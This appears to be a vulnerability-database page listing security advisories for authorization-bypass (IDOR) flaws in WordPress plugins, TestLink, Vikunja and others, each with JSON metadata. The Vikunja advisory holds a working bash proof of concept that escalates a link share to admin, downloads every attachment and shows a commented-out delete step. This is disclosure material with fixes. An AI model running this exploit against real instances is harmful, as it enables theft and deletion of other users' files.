CWE-639
AllowedAuthorization Bypass Through User-Controlled Key
Abstraction: Base · Status: Incomplete
The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.
3240 vulnerabilities reference this CWE, most recent first.
GHSA-2P29-98C8-MC4X
Vulnerability from github – Published: 2022-11-29 21:30 – Updated: 2026-04-08 21:31The TeraWallet plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 1.4.3. This is due to insufficient validation of the user-controlled key on the lock_unlock_terawallet AJAX action. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to lock/unlock other users wallets.
{
"affected": [],
"aliases": [
"CVE-2022-3995"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-29T21:15:00Z",
"severity": "MODERATE"
},
"details": "The TeraWallet plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 1.4.3. This is due to insufficient validation of the user-controlled key on the lock_unlock_terawallet AJAX action. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to lock/unlock other users wallets.",
"id": "GHSA-2p29-98c8-mc4x",
"modified": "2026-04-08T21:31:45Z",
"published": "2022-11-29T21:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-3995"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/2817824/woo-wallet/trunk?contextall=1\u0026old=2816610\u0026old_path=%2Fwoo-wallet%2Ftrunk"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ec57e0b2-61b0-4b67-9784-dbb4e6c4e4a6?source=cve"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/vulnerability-advisories-continued/#CVE-2022-3995"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2P4Q-QCHF-H9Q6
Vulnerability from github – Published: 2026-03-13 21:31 – Updated: 2026-06-08 15:32A broken access control may allow an authenticated user to perform a horizontal privilege escalation. The vulnerability only impacts specific configurations.
{
"affected": [],
"aliases": [
"CVE-2026-3999"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-13T19:55:13Z",
"severity": "HIGH"
},
"details": "A broken access control may allow an authenticated user to perform a \nhorizontal privilege escalation. The vulnerability only impacts specific\n configurations.",
"id": "GHSA-2p4q-qchf-h9q6",
"modified": "2026-06-08T15:32:40Z",
"published": "2026-03-13T21:31:51Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3999"
},
{
"type": "WEB",
"url": "https://docs.pointsharp.com/psa/advisories/psa-2026-001.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-2P54-Q56G-9668
Vulnerability from github – Published: 2026-01-15 18:31 – Updated: 2026-01-15 18:31TestLink versions 1.16 through 1.19 contain an unauthenticated file download vulnerability in the attachmentdownload.php endpoint. Attackers can download arbitrary files by iterating file IDs through the 'id' parameter with 'skipCheck=1' to bypass access controls.
{
"affected": [],
"aliases": [
"CVE-2021-47760"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-15T16:16:06Z",
"severity": "MODERATE"
},
"details": "TestLink versions 1.16 through 1.19 contain an unauthenticated file download vulnerability in the attachmentdownload.php endpoint. Attackers can download arbitrary files by iterating file IDs through the \u0027id\u0027 parameter with \u0027skipCheck=1\u0027 to bypass access controls.",
"id": "GHSA-2p54-q56g-9668",
"modified": "2026-01-15T18:31:29Z",
"published": "2026-01-15T18:31:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-47760"
},
{
"type": "WEB",
"url": "https://testlink.org"
},
{
"type": "WEB",
"url": "https://web.archive.org/web/20211208031345/https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/50578"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-2P66-2G75-QW5G
Vulnerability from github – Published: 2024-04-09 21:32 – Updated: 2024-04-09 21:32The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_uri_editor' function in all versions up to, and including, 2.4.3.1. This makes it possible for unauthenticated attackers to view the permalinks of all posts.
{
"affected": [],
"aliases": [
"CVE-2024-2543"
],
"database_specific": {
"cwe_ids": [
"CWE-639",
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-09T19:15:35Z",
"severity": "MODERATE"
},
"details": "The Permalink Manager Lite plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the \u0027get_uri_editor\u0027 function in all versions up to, and including, 2.4.3.1. This makes it possible for unauthenticated attackers to view the permalinks of all posts.",
"id": "GHSA-2p66-2g75-qw5g",
"modified": "2024-04-09T21:32:00Z",
"published": "2024-04-09T21:32:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2543"
},
{
"type": "WEB",
"url": "https://gist.github.com/Xib3rR4dAr/a248426dfee107c6fda08e80f98fa894"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3053899"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/74f6bf42-3406-47c5-b255-6cc1e8084fb5?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2PQ9-46MH-W84J
Vulnerability from github – Published: 2025-02-14 06:30 – Updated: 2025-02-25 21:31The Return Refund and Exchange For WooCommerce – Return Management System, RMA Exchange, Wallet And Cancel Order Features plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.4.5 via several functions due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to overwrite linked refund image attachments, overwrite refund request message, overwrite order messages, and read order messages of other users.
{
"affected": [],
"aliases": [
"CVE-2024-13692"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-14T06:15:20Z",
"severity": "MODERATE"
},
"details": "The Return Refund and Exchange For WooCommerce \u2013 Return Management System, RMA Exchange, Wallet And Cancel Order Features plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.4.5 via several functions due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to overwrite linked refund image attachments, overwrite refund request message, overwrite order messages, and read order messages of other users.",
"id": "GHSA-2pq9-46mh-w84j",
"modified": "2025-02-25T21:31:33Z",
"published": "2025-02-14T06:30:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-13692"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/woo-refund-and-exchange-lite/trunk/common/class-woo-refund-and-exchange-lite-common.php#L127"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/woo-refund-and-exchange-lite/trunk/common/class-woo-refund-and-exchange-lite-common.php#L186"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/woo-refund-and-exchange-lite/trunk/common/class-woo-refund-and-exchange-lite-common.php#L374"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/woo-refund-and-exchange-lite/trunk/public/class-woo-refund-and-exchange-lite-public.php#L381"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3236486"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dafbf6e2-1160-4551-a987-5e94c9157ff2?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2PV8-4C52-MF8J
Vulnerability from github – Published: 2026-03-26 16:56 – Updated: 2026-03-26 16:56Summary
Two independently-exploitable authorization flaws in Vikunja can be chained to allow an unauthenticated attacker to download and delete every file attachment across all projects in a Vikunja instance. The ReadAll endpoint for link shares exposes share hashes (including admin-level shares) to any user with read access, enabling permission escalation. The task attachment ReadOne/GetTaskAttachment endpoint performs permission checks against a user-supplied task ID but fetches the attachment by its own sequential ID without verifying the attachment belongs to that task, enabling cross-project file access.
Details
Vulnerability 1: Link Share Hash Disclosure (Permission Escalation Entry Point)
Tracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8hp8-9fhr-pfm9
The LinkSharing.ReadAll() method in pkg/models/link_sharing.go:228-287 returns all link shares for a project, including the Hash field:
// pkg/models/link_sharing.go:46-50
type LinkSharing struct {
ID int64 `xorm:"bigint autoincr not null unique pk" json:"id" param:"share"`
Hash string `xorm:"varchar(40) not null unique" json:"hash" param:"hash"` // ← exposed in JSON
// ...
}
The ReadAll clears passwords but not hashes:
// pkg/models/link_sharing.go:272-277
for _, s := range shares {
if sharedBy, has := users[s.SharedByID]; has {
s.SharedBy = sharedBy
}
s.Password = "" // ← password cleared, but hash remains
}
A link share user with read-only access can call GET /api/v1/projects/:project/shares (routed at pkg/routes/routes.go:483) to discover all shares, then authenticate with an admin-level share hash.
Vulnerability 2: Cross-Project Attachment IDOR (Data Exfiltration)
Tracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-jfmm-mjcp-8wq2
The GetTaskAttachment handler in pkg/routes/api/v1/task_attachment.go:156-186 performs the permission check against the task ID supplied in the URL:
// pkg/models/task_attachment_permissions.go:25-28
func (ta *TaskAttachment) CanRead(s *xorm.Session, a web.Auth) (bool, int, error) {
t := &Task{ID: ta.TaskID} // ← ta.TaskID from URL parameter
return t.CanRead(s, a) // ← checks if user can read THIS task
}
But ReadOne fetches the attachment by its own ID, ignoring the task:
// pkg/models/task_attachment.go:110-111
func (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {
exists, err := s.Where("id = ?", ta.ID).Get(ta) // ← fetches by attachment ID only
// ta.TaskID is now overwritten with the ACTUAL task ID from the database
// But the permission check already passed using the attacker-controlled task ID
This means: specify a task you CAN access, but an attachment ID from a different project → permission check passes, wrong attachment is returned.
The Chain
Link share URL (public)
→ POST /shares/{hash}/auth (get JWT)
→ GET /projects/{id}/shares (discover admin share hash)
→ POST /shares/{admin_hash}/auth (escalate to admin)
→ GET /projects/{id}/tasks (find any accessible task ID)
→ GET /tasks/{accessible_task}/attachments/{1..N} (enumerate ALL attachments)
→ DELETE /tasks/{accessible_task}/attachments/{1..N} (destroy ALL attachments)
PoC
Prerequisites: A Vikunja instance with at least one link share (any permission level). The attacker only needs the link share URL.
VIKUNJA="http://localhost:3456/api/v1"
# Step 1: Authenticate with a known read-only link share hash
# (Link share URLs look like: https://instance/share/HASH_HERE)
SHARE_HASH="read-only-share-hash"
TOKEN=$(curl -s -X POST "$VIKUNJA/shares/$SHARE_HASH/auth" \
-H "Content-Type: application/json" \
-d '{}' | jq -r '.token')
echo "Got JWT: $TOKEN"
# Step 2: Discover all link shares for the project (including admin shares)
PROJECT_ID=1 # from the link share JWT claims
SHARES=$(curl -s "$VIKUNJA/projects/$PROJECT_ID/shares" \
-H "Authorization: Bearer $TOKEN")
echo "All shares exposed:"
echo "$SHARES" | jq '.[].hash' # All hashes visible, including admin shares
# Step 3: Escalate to admin if available
ADMIN_HASH=$(echo "$SHARES" | jq -r '.[] | select(.permission == 2) | .hash' | head -1)
if [ -n "$ADMIN_HASH" ]; then
TOKEN=$(curl -s -X POST "$VIKUNJA/shares/$ADMIN_HASH/auth" \
-H "Content-Type: application/json" \
-d '{}' | jq -r '.token')
echo "Escalated to admin share: $ADMIN_HASH"
fi
# Step 4: Get a task ID we can legitimately access
TASK_ID=$(curl -s "$VIKUNJA/projects/$PROJECT_ID/tasks" \
-H "Authorization: Bearer $TOKEN" | jq '.[0].id')
echo "Using accessible task: $TASK_ID"
# Step 5: Exploit attachment IDOR - enumerate ALL attachments across ALL projects
for ATTACHMENT_ID in $(seq 1 100); do
RESP=$(curl -s -o /tmp/attachment_$ATTACHMENT_ID -w "%{http_code}" \
"$VIKUNJA/tasks/$TASK_ID/attachments/$ATTACHMENT_ID" \
-H "Authorization: Bearer $TOKEN")
if [ "$RESP" = "200" ]; then
echo "Downloaded attachment $ATTACHMENT_ID (from ANY project): /tmp/attachment_$ATTACHMENT_ID"
fi
done
# Step 6 (destructive, with admin share): Delete attachments from other projects
# curl -s -X DELETE "$VIKUNJA/tasks/$TASK_ID/attachments/$TARGET_ATTACHMENT_ID" \
# -H "Authorization: Bearer $TOKEN"
Impact
Confidentiality (HIGH): An attacker with a single publicly-shared link share URL can download every file attachment across all projects in the Vikunja instance. Attachment IDs are sequential integers, making enumeration trivial. This includes confidential documents, images, and any files uploaded by any user in any project.
Integrity (HIGH): With the permission escalation from read-only to admin (via hash disclosure), the attacker can delete attachments from any project, causing data loss across the entire instance.
Attack prerequisites are minimal: Link shares are designed to be publicly shared — they're the mechanism for sharing projects with external collaborators. A single leaked or intentionally-shared link share URL (even read-only) is sufficient to compromise all file attachments instance-wide.
Blast radius: Every project, every task, every file attachment on the instance is exposed regardless of project membership, team boundaries, or access controls.
Recommended Fix
Fix 1 — Link Share Hash Disclosure: Clear the hash field in ReadAll responses:
// pkg/models/link_sharing.go — in ReadAll loop (~line 272)
for _, s := range shares {
if sharedBy, has := users[s.SharedByID]; has {
s.SharedBy = sharedBy
}
s.Password = ""
s.Hash = "" // ← ADD THIS: never expose hashes to other share holders
}
Fix 2 — Attachment IDOR: Verify the attachment belongs to the specified task in both ReadOne and the download handler:
// pkg/models/task_attachment.go — ReadOne
func (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {
exists, err := s.Where("id = ? AND task_id = ?", ta.ID, ta.TaskID).Get(ta)
// ^^^^^^^^^^^^^^ ADD: verify task ownership
if err != nil {
return
}
// ...
}
Both fixes should be applied — the attachment IDOR is exploitable independently by any authenticated user, and the link share hash disclosure enables permission escalation even without the attachment bug.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.2.0"
},
"package": {
"ecosystem": "Go",
"name": "code.vikunja.io/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T16:56:24Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\nTwo independently-exploitable authorization flaws in Vikunja can be chained to allow an unauthenticated attacker to download and delete every file attachment across all projects in a Vikunja instance. The `ReadAll` endpoint for link shares exposes share hashes (including admin-level shares) to any user with read access, enabling permission escalation. The task attachment `ReadOne`/`GetTaskAttachment` endpoint performs permission checks against a user-supplied task ID but fetches the attachment by its own sequential ID without verifying the attachment belongs to that task, enabling cross-project file access.\n\n## Details\n\n### Vulnerability 1: Link Share Hash Disclosure (Permission Escalation Entry Point)\n\nTracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8hp8-9fhr-pfm9\n\nThe `LinkSharing.ReadAll()` method in `pkg/models/link_sharing.go:228-287` returns all link shares for a project, including the `Hash` field:\n\n```go\n// pkg/models/link_sharing.go:46-50\ntype LinkSharing struct {\n ID int64 `xorm:\"bigint autoincr not null unique pk\" json:\"id\" param:\"share\"`\n Hash string `xorm:\"varchar(40) not null unique\" json:\"hash\" param:\"hash\"` // \u2190 exposed in JSON\n // ...\n}\n```\n\nThe ReadAll clears passwords but not hashes:\n```go\n// pkg/models/link_sharing.go:272-277\nfor _, s := range shares {\n if sharedBy, has := users[s.SharedByID]; has {\n s.SharedBy = sharedBy\n }\n s.Password = \"\" // \u2190 password cleared, but hash remains\n}\n```\n\nA link share user with read-only access can call `GET /api/v1/projects/:project/shares` (routed at `pkg/routes/routes.go:483`) to discover all shares, then authenticate with an admin-level share hash.\n\n### Vulnerability 2: Cross-Project Attachment IDOR (Data Exfiltration)\n\nTracked in https://github.com/go-vikunja/vikunja/security/advisories/GHSA-jfmm-mjcp-8wq2\n\nThe `GetTaskAttachment` handler in `pkg/routes/api/v1/task_attachment.go:156-186` performs the permission check against the task ID supplied in the URL:\n\n```go\n// pkg/models/task_attachment_permissions.go:25-28\nfunc (ta *TaskAttachment) CanRead(s *xorm.Session, a web.Auth) (bool, int, error) {\n t := \u0026Task{ID: ta.TaskID} // \u2190 ta.TaskID from URL parameter\n return t.CanRead(s, a) // \u2190 checks if user can read THIS task\n}\n```\n\nBut `ReadOne` fetches the attachment by its own ID, ignoring the task:\n\n```go\n// pkg/models/task_attachment.go:110-111\nfunc (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {\n exists, err := s.Where(\"id = ?\", ta.ID).Get(ta) // \u2190 fetches by attachment ID only\n // ta.TaskID is now overwritten with the ACTUAL task ID from the database\n // But the permission check already passed using the attacker-controlled task ID\n```\n\nThis means: specify a task you CAN access, but an attachment ID from a different project \u2192 permission check passes, wrong attachment is returned.\n\n### The Chain\n\n```\nLink share URL (public)\n \u2192 POST /shares/{hash}/auth (get JWT)\n \u2192 GET /projects/{id}/shares (discover admin share hash)\n \u2192 POST /shares/{admin_hash}/auth (escalate to admin)\n \u2192 GET /projects/{id}/tasks (find any accessible task ID)\n \u2192 GET /tasks/{accessible_task}/attachments/{1..N} (enumerate ALL attachments)\n \u2192 DELETE /tasks/{accessible_task}/attachments/{1..N} (destroy ALL attachments)\n```\n\n## PoC\n\n**Prerequisites:** A Vikunja instance with at least one link share (any permission level). The attacker only needs the link share URL.\n\n```bash\nVIKUNJA=\"http://localhost:3456/api/v1\"\n\n# Step 1: Authenticate with a known read-only link share hash\n# (Link share URLs look like: https://instance/share/HASH_HERE)\nSHARE_HASH=\"read-only-share-hash\"\n\nTOKEN=$(curl -s -X POST \"$VIKUNJA/shares/$SHARE_HASH/auth\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{}\u0027 | jq -r \u0027.token\u0027)\n\necho \"Got JWT: $TOKEN\"\n\n# Step 2: Discover all link shares for the project (including admin shares)\nPROJECT_ID=1 # from the link share JWT claims\n\nSHARES=$(curl -s \"$VIKUNJA/projects/$PROJECT_ID/shares\" \\\n -H \"Authorization: Bearer $TOKEN\")\n\necho \"All shares exposed:\"\necho \"$SHARES\" | jq \u0027.[].hash\u0027 # All hashes visible, including admin shares\n\n# Step 3: Escalate to admin if available\nADMIN_HASH=$(echo \"$SHARES\" | jq -r \u0027.[] | select(.permission == 2) | .hash\u0027 | head -1)\n\nif [ -n \"$ADMIN_HASH\" ]; then\n TOKEN=$(curl -s -X POST \"$VIKUNJA/shares/$ADMIN_HASH/auth\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{}\u0027 | jq -r \u0027.token\u0027)\n echo \"Escalated to admin share: $ADMIN_HASH\"\nfi\n\n# Step 4: Get a task ID we can legitimately access\nTASK_ID=$(curl -s \"$VIKUNJA/projects/$PROJECT_ID/tasks\" \\\n -H \"Authorization: Bearer $TOKEN\" | jq \u0027.[0].id\u0027)\n\necho \"Using accessible task: $TASK_ID\"\n\n# Step 5: Exploit attachment IDOR - enumerate ALL attachments across ALL projects\nfor ATTACHMENT_ID in $(seq 1 100); do\n RESP=$(curl -s -o /tmp/attachment_$ATTACHMENT_ID -w \"%{http_code}\" \\\n \"$VIKUNJA/tasks/$TASK_ID/attachments/$ATTACHMENT_ID\" \\\n -H \"Authorization: Bearer $TOKEN\")\n\n if [ \"$RESP\" = \"200\" ]; then\n echo \"Downloaded attachment $ATTACHMENT_ID (from ANY project): /tmp/attachment_$ATTACHMENT_ID\"\n fi\ndone\n\n# Step 6 (destructive, with admin share): Delete attachments from other projects\n# curl -s -X DELETE \"$VIKUNJA/tasks/$TASK_ID/attachments/$TARGET_ATTACHMENT_ID\" \\\n# -H \"Authorization: Bearer $TOKEN\"\n```\n\n## Impact\n\n**Confidentiality (HIGH):** An attacker with a single publicly-shared link share URL can download every file attachment across all projects in the Vikunja instance. Attachment IDs are sequential integers, making enumeration trivial. This includes confidential documents, images, and any files uploaded by any user in any project.\n\n**Integrity (HIGH):** With the permission escalation from read-only to admin (via hash disclosure), the attacker can delete attachments from any project, causing data loss across the entire instance.\n\n**Attack prerequisites are minimal:** Link shares are designed to be publicly shared \u2014 they\u0027re the mechanism for sharing projects with external collaborators. A single leaked or intentionally-shared link share URL (even read-only) is sufficient to compromise all file attachments instance-wide.\n\n**Blast radius:** Every project, every task, every file attachment on the instance is exposed regardless of project membership, team boundaries, or access controls.\n\n## Recommended Fix\n\n**Fix 1 \u2014 Link Share Hash Disclosure:** Clear the hash field in ReadAll responses:\n\n```go\n// pkg/models/link_sharing.go \u2014 in ReadAll loop (~line 272)\nfor _, s := range shares {\n if sharedBy, has := users[s.SharedByID]; has {\n s.SharedBy = sharedBy\n }\n s.Password = \"\"\n s.Hash = \"\" // \u2190 ADD THIS: never expose hashes to other share holders\n}\n```\n\n**Fix 2 \u2014 Attachment IDOR:** Verify the attachment belongs to the specified task in both ReadOne and the download handler:\n\n```go\n// pkg/models/task_attachment.go \u2014 ReadOne\nfunc (ta *TaskAttachment) ReadOne(s *xorm.Session, _ web.Auth) (err error) {\n exists, err := s.Where(\"id = ? AND task_id = ?\", ta.ID, ta.TaskID).Get(ta)\n // ^^^^^^^^^^^^^^ ADD: verify task ownership\n if err != nil {\n return\n }\n // ...\n}\n```\n\nBoth fixes should be applied \u2014 the attachment IDOR is exploitable independently by any authenticated user, and the link share hash disclosure enables permission escalation even without the attachment bug.",
"id": "GHSA-2pv8-4c52-mf8j",
"modified": "2026-03-26T16:56:24Z",
"published": "2026-03-26T16:56:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-2pv8-4c52-mf8j"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8hp8-9fhr-pfm9"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-jfmm-mjcp-8wq2"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-vikunja/vikunja"
},
{
"type": "WEB",
"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Vikunja: Unauthenticated Instance-Wide Data Breach via Link Share Hash Disclosure Chained with Cross-Project Attachment IDOR"
}
GHSA-2Q4Q-JQHC-8RG8
Vulnerability from github – Published: 2026-05-14 09:31 – Updated: 2026-05-14 09:31The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.2.0 via the exportEntries function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Fluent Forms manager-level access and above, to bypass form-level access restrictions to access submissions from forms they are not authorized to view, export data from arbitrary database tables, and enumerate database table names via error message disclosure.
{
"affected": [],
"aliases": [
"CVE-2026-5395"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-14T07:16:20Z",
"severity": "HIGH"
},
"details": "The Fluent Forms \u2013 Customizable Contact Forms, Survey, Quiz, \u0026 Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.2.0 via the exportEntries function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Fluent Forms manager-level access and above, to bypass form-level access restrictions to access submissions from forms they are not authorized to view, export data from arbitrary database tables, and enumerate database table names via error message disclosure.",
"id": "GHSA-2q4q-jqhc-8rg8",
"modified": "2026-05-14T09:31:28Z",
"published": "2026-05-14T09:31:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5395"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3507987/fluentform/trunk/app/Services/Transfer/TransferService.php"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd12b8a-2033-4236-abcd-2a8d08e7f099?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2Q9F-33Q6-9426
Vulnerability from github – Published: 2026-01-21 03:30 – Updated: 2026-01-21 03:30The Academy LMS – WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.5.0. This is due to the plugin not properly validating a user's identity prior to updating their password and relying solely on a publicly-exposed nonce for authorization. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and gain access to their account.
{
"affected": [],
"aliases": [
"CVE-2025-15521"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-21T02:15:48Z",
"severity": "CRITICAL"
},
"details": "The Academy LMS \u2013 WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.5.0. This is due to the plugin not properly validating a user\u0027s identity prior to updating their password and relying solely on a publicly-exposed nonce for authorization. This makes it possible for unauthenticated attackers to change arbitrary user\u0027s password, including administrators, and gain access to their account.",
"id": "GHSA-2q9f-33q6-9426",
"modified": "2026-01-21T03:30:20Z",
"published": "2026-01-21T03:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15521"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/academy/tags/3.5.0/includes/functions.php#L1581"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6687ebbe-fdf4-4ecb-bf59-034bb4b0104c?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2QHV-QFJF-5JF4
Vulnerability from github – Published: 2026-07-01 06:31 – Updated: 2026-07-01 06:31The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.9.1 via the 'userId' parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the course enrollment progress and completion data belonging to any instructor or administrator account on the site. This IDOR does not apply when the target user is a regular subscriber, as the guard correctly blocks cross-subscriber access; exploitation is limited to cases where the victim user holds the LP_TEACHER_ROLE or administrator role.
{
"affected": [],
"aliases": [
"CVE-2026-11988"
],
"database_specific": {
"cwe_ids": [
"CWE-639"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-01T05:16:16Z",
"severity": "MODERATE"
},
"details": "The LearnPress \u2013 WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.9.1 via the \u0027userId\u0027 parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the course enrollment progress and completion data belonging to any instructor or administrator account on the site. This IDOR does not apply when the target user is a regular subscriber, as the guard correctly blocks cross-subscriber access; exploitation is limited to cases where the victim user holds the LP_TEACHER_ROLE or administrator role.",
"id": "GHSA-2qhv-qfjf-5jf4",
"modified": "2026-07-01T06:31:33Z",
"published": "2026-07-01T06:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11988"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.2.7.5/inc/rest-api/v1/frontend/class-lp-rest-lazy-load-controller.php#L118"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.2.7.5/inc/rest-api/v1/frontend/class-lp-rest-lazy-load-controller.php#L137"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/learnpress/tags/4.2.7.5/inc/user/abstract-lp-user.php#L680"
},
{
"type": "WEB",
